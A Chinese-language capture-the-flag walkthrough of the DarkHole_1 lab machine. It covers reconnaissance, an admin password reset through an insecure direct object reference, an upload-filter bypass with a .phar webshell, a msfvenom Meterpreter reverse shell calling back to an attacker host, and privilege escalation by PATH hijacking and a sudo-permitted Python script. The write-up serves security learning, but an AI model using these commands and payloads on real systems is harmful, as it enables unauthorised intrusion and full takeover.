DarkHole靶机渗透过程

准备环境

攻击机:Kali-Linux-2021.2
目标靶机:DarkHole_1
平台:VMware Workstation 16
均为NAT模式

一、信息搜集

1.主机嗅探

KaliDarkHole_1处于同一网段,查看Kali当前IP

ifconfig

1

可知KaliIP192.168.183.128/24,进行网段扫描

netdiscover -r 192.168.183.0/24

2

扫描结果显示靶机的IP地址为192.168.183.132

2.端口扫描

对靶机进行端口扫描

nmap -A -p- 192.168.183.132

扫出靶机开放端口为2280

3

端口服务
22SSH
80Http(Apache/Ubuntu)

3.访问其web页面

4

发现网页右上角有Login,点击转到登录界面

5

没有发现其他有价值信息

二、漏洞挖掘

1.目录扫描

对靶机web进行目录扫描

dirsearch -u http://192.168.183.132

发现以下目录

6

config目录进行访问

7

存在一个名为database.php的文件,但没有读取权限

访问dashboard.php页面

8

提示无权限进行访问,估计应该是需要登陆

访问upload目录

0

发现存在名为d.jpg的图片,对其进行查看

10

将此图拖入WinHex中查看是否含有隐藏信息

11

其实可以发现其中貌似并没有任何有价值的信息

2.后台渗透

刚才目录扫描时,发现有注册页面,对其访问

12

发现当usernameadmin时,会提示用户admin已存在

13

先随便注册个用户并进入该用户后台

14

可以发现有个更改密码的选项,可以尝试在修改的同时抓个包

15

可知现在这个用户的id2,猜测用户adminid1,尝试修改是否能达到更改admin密码的目的

16

在更改id之后,返回结果已回显密码已被更改,尝试使用用户amdin进行登录

17

3.拿到webshell

1.中国蚁剑之一句话木马

发现admin的后台有文件上传,推测应该有文件上传漏洞,测试使用一句话木马进行上传

18

但上传时报错,提示只能上传图片类的文件

19

经测试将后缀php改为jpg之后能上传,最终发现phar文件可以绕过上传检测,将一句话木马上传之后,使用中国蚁剑对其链接,可拿到后台

20

完成拿shell

2.msf之反弹shell

msfvenom生成免杀反弹shell

msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.225.128 lport=9999 -e -f raw > msfvenom.phar

21

将该木马通过admin的后台上传至靶机,并且在msf中启动监听

# 使用监听模块
use exploit/multi/handler
# 设置本地监听服务器
set lhost 192.168.225.128
# 设置本地监听端口
set lport 9999
# 设置监听有效载荷
set patload php/meterpreter_reverse_tcp
# 查看配置信息
show options
# 运行
run

22

访问刚上传的木马文件,出现回显

23

完成拿shell

4.提权

发现用户john目录下有可执行的toto文件

24

尝试执行toto文件

./toto

25

由回显可知,文件toto是以用户john的身份运行命令id

编辑id文件,写入/bin/bash,将原有的路径写入到环境变量中,再次执行toto文件就会获得johnshell

echo '/bin/bash' > /tmp/id
chmod 777 /tmp/id
export PATH=/tmp:$PATH
./toto

26

password文件下为用户john的密码,可使用ssh登录上去

cat password

27

查看user.txt可拿到第一个flag

cat user.txt

28

查看file.py发现该文件为空

cat file.py

29

查看用户john所拥有的权限

sudo -l

30

发现可以用root身份使用python3命令执行file.py文件

可以写入shell到file.py文件中,然后使用sudo命令执行

echo "import os;os.system('/bin/bash')" > file.py 

执行file.py

sudo python3 /home/john/file.py

31

进入root家目录查看文件

cd ~ && ls -lha

32

最后的flag值在root.txt

目标靶机已完成渗透